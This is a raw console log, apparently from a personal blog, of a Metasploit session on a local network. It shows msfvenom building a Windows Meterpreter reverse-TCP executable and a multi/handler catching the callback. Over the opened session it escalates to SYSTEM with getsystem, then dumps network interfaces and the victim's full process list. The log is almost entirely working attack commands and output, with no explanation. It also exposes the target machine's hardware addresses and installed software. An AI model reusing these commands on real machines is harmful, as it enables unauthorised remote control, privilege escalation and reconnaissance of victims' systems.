root@Debian:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.235 LPORT=6666 -f exe X > /root/0.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

root@Debian:~# msfconsole

       https://metasploit.com

       =[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]

msf5 > use exploit/mulit/handler
[-] Failed to load module: exploit/mulit/handler
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show opinions
[-] Invalid parameter "opinions", use "show -h" for more information
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > set LHOST 192.168.31.235
LHOST => 192.168.31.235
msf5 exploit(multi/handler) > set LPORt 6666
LPORt => 6666
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.31.235:6666
[*] Sending stage (179779 bytes) to 192.168.31.222
[*] Meterpreter session 1 opened (192.168.31.235:6666 -> 192.168.31.222:55438) at 2019-03-20 22:31:32 +0800

meterpreter > cd
Usage: cd directory
meterpreter > cmd
[-] Unknown command: cmd.
meterpreter > getid
[-] Unknown command: getid.
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface  3
============
Name         : Realtek RTL8192EU Wireless LAN 802.11n USB 2.0 Network Adapter
Hardware MAC : 48:8a:d2:6d:18:5c
MTU          : 1500
IPv4 Address : 192.168.31.222
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::748c:5a8f:8507:5708
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface  8
============
Name         : VMware Virtual Ethernet Adapter for VMnet1
Hardware MAC : 00:50:56:c0:00:01
MTU          : 1500
IPv4 Address : 192.168.47.1
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ecef:54ab:e36d:3543
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 12
============
Name         : Realtek PCIe GBE Family Controller
Hardware MAC : 00:25:11:51:e1:cf
MTU          : 1500
IPv4 Address : 169.254.52.218
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::c5c8:bd71:b772:34da
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 14
============
Name         : Microsoft Wi-Fi Direct Virtual Adapter
Hardware MAC : 4a:8a:d2:6d:18:5c
MTU          : 1500
IPv4 Address : 169.254.164.149
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::514a:ff29:7a13:a495
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > successful!!!!
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > sessions -i
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions -i 0
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter >
meterpreter > sessions -i 1
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > getlwd
/root
meterpreter > ps

Process List
============

 PID  PPID  Name  Arch  Session  User  Path
 ---  ----  ----  ----  -------  ----  ----
 0  0  [System Process]
 4  0  System  x64  0
 64  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 320  4  smss.exe  x64  0
 464  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 536  524  csrss.exe  x64  0
 632  764  dwm.exe  x64  1  Window Manager\DWM-1  C:\Windows\System32\dwm.exe
 636  524  wininit.exe  x64  0
 652  628  csrss.exe  x64  1
 704  636  services.exe  x64  0
 732  636  lsass.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
 764  628  winlogon.exe  x64  1  NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
 888  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 900  636  fontdrvhost.exe  x64  0  Font Driver Host\UMFD-0  C:\Windows\System32\fontdrvhost.exe
 908  764  fontdrvhost.exe  x64  1  Font Driver Host\UMFD-1  C:\Windows\System32\fontdrvhost.exe
 972  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1084  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1092  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1124  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1176  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1184  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1240  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1260  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1316  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1324  8704  CoreSync.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
 1336  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1368  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1420  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1492  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1576  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1672  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1684  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1728  1124  MpCmdRun.exe  x64  0  NT AUTHORITY\SYSTEM  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1902.2-0\MpCmdRun.exe
 1816  704  nvvsvc.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\nvvsvc.exe
 1824  704  nvSCPAPISvr.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
 1872  1816  nvxdsync.exe  x64  1  NT AUTHORITY\SYSTEM  C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
 1880  1816  nvvsvc.exe  x64  1  NT AUTHORITY\SYSTEM  C:\Windows\System32\nvvsvc.exe
 1896  6748  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 1932  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1944  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 1952  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1972  7040  check_service.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Users\Administrator\AppData\Roaming\news_check\check_service.exe
 2016  4  Memory Compression  x64  0
 2036  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 2060  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2068  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 2120  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 2160  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 2244  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2296  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2352  704  svchost.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Windows\SysWOW64\svchost.exe
 2396  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 2460  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2524  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 2536  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 2600  704  spoolsv.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
 2604  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2636  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2716  972  TXPlatform.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQ\Bin\TXPlatform.exe
 2768  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 2828  972  WmiPrvSE.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2868  972  WinStore.App.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\WindowsApps\Microsoft.WindowsStore_11811.1001.18.0_x64__8wekyb3d8bbwe\WinStore.App.exe
 2912  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2980  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2988  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 3020  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 3232  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 3312  704  AGMService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
 3320  704  AdobeUpdateService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
 3328  704  AGSService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
 3336  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 3360  704  CloudPrint.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Deepin Cloud Print Server\CloudPrint.exe
 3368  704  DeepinCloudScanService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Deepin Cloud Scan Server\DeepinCloudScanService.exe
 3384  5736  PageGuard.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\PageGuard\PageGuard.exe
 3408  704  FlashHelperService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Windows\SysWOW64\Macromed\Flash\FlashHelperService.exe
 3432  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 3444  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 3476  6696  Adobe CEF Helper.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
 3484  704  NvNetworkService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
 3508  704  PGService.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files\PageGuard\PGService.exe
 3532  704  QQProtect.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Common Files\Tencent\QQProtect\Bin\QQProtect.exe
 3564  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 3576  5736  RAVCpl64.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
 3588  5736  QQMusic.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Tencent\QQMusic\QQMusic.exe
 3596  704  SecurityHealthService.exe  x64  0
 3632  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 3672  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 3684  704  vmware-authd.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
 3704  704  TsService.exe  x86  0  NT AUTHORITY\SYSTEM  E:\app data\QQBrowser\TsService.exe
 3716  704  vmware-usbarbitrator64.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
 3728  704  vmnetdhcp.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Windows\SysWOW64\vmnetdhcp.exe
 3792  704  MsMpEng.exe  x64  0
 3804  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 4196  972  RuntimeBroker.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\RuntimeBroker.exe
 4380  6696  Adobe CEF Helper.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
 4416  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 4460  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 4476  704  vmware-hostd.exe  x86  0  NT AUTHORITY\SYSTEM  C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
 5020  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 5168  6836  wpscenter.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Users\Administrator\AppData\Local\Kingsoft\WPS Office\11.1.0.8415\office6\wpscenter.exe
 5264  704  svchost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\svchost.exe
 5272  1368  sihost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\sihost.exe
 5284  5736  YunDetectService.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\?????\BaiduNetdisk\YunDetectService.exe
 5292  704  svchost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\svchost.exe
 5352  1896  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 5440  1124  taskhostw.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\taskhostw.exe
 5448  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 5644  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 5660  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 5736  5632  explorer.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\explorer.exe
 5868  5660  ctfmon.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\ctfmon.exe
 5932  972  ApplicationFrameHost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\ApplicationFrameHost.exe
 5980  704  svchost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\svchost.exe
 5996  972  ChsIME.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\InputMethod\CHS\ChsIME.exe
 6056  972  SearchUI.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
 6148  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 6188  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 6384  972  dllhost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\dllhost.exe
 6392  2352  EPEnvUpdate.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Servyou\EnvUpdate\EPEnvUpdate.exe
 6400  2352  PTXBootSvc.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Servyou\PTXSvcBoot\PTXBootSvc.exe
 6424  2352  SyHttpd.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Servyou\SyHttpd\SyHttpd.exe
 6560  972  RuntimeBroker.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\RuntimeBroker.exe
 6592  972  Video.UI.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19021.10411.0_x64__8wekyb3d8bbwe\Video.UI.exe
 6648  2352  SYPNS.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Servyou\SYPNS\SYPNS.exe
 6696  7280  Creative Cloud.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
 6768  972  ShellExperienceHost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
 6836  6692  wps.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Users\Administrator\AppData\Local\Kingsoft\WPS Office\11.1.0.8415\office6\wps.exe
 7220  972  RuntimeBroker.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\RuntimeBroker.exe
 7228  8704  CCXProcess.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
 7336  5736  DeepinCloudScanConfiger.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Deepin Cloud Scan Server\DeepinCloudScanConfiger.exe
 7380  1872  nvtray.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
 7388  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 7432  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 7444  5588  check_ad_helper.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Users\Administrator\AppData\Roaming\news_check\temp\check_ad_helper.exe
 7524  7380  NvBackend.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
 7608  5392  QQ.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQ\Bin\QQ.exe
 7640  7280  vmware-tray.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe
 7724  972  SkypeBackgroundHost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.41.54.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
 7836  972  PeopleExperienceHost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\PeopleExperienceHost.exe
 8196  3588  qbclient.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Tencent\QQMusic\qbclient\qbclient.exe
 8272  5736  0.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Users\Administrator\Desktop\0.exe
 8492  7228  node.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
 8704  6696  Adobe Desktop Service.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
 8840  8492  conhost.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\conhost.exe
 8856  6696  AdobeIPCBroker.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
 9192  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 9280  10024  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 9312  6836  wpscenter.exe  x86  1  WIN-PUES7CR290R\Administrator  C:\Users\Administrator\AppData\Local\Kingsoft\WPS Office\11.1.0.8415\office6\wpscenter.exe
 9432  11664  conhost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\conhost.exe
 9592  972  RuntimeBroker.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\RuntimeBroker.exe
 9880  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 9972  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 10024  1896  QQBrowser.exe  x86  1  WIN-PUES7CR290R\Administrator  E:\app data\QQBrowser\QQBrowser.exe
 10508  972  Music.UI.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19011.11311.0_x64__8wekyb3d8bbwe\Music.UI.exe
 10728  972  SystemSettings.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\ImmersiveControlPanel\SystemSettings.exe
 10892  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 10904  972  RuntimeBroker.exe  x64  1  WIN-PUES7CR290R\Administrator  C:\Windows\System32\RuntimeBroker.exe
 11164  704  svchost.exe  x64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 11272  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 11664  1124  MpCmdRun.exe  x64  0  NT AUTHORITY\SYSTEM  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1902.2-0\MpCmdRun.exe
 12236  704  svchost.exe  x64  0  NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 12248  704  svchost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 12784  1728  conhost.exe  x64  0  NT AUTHORITY\SYSTEM  C:\Windows\System32\conhost.exe
Original: https://www.cnblogs.com/2466579747deepin/p/10568380.html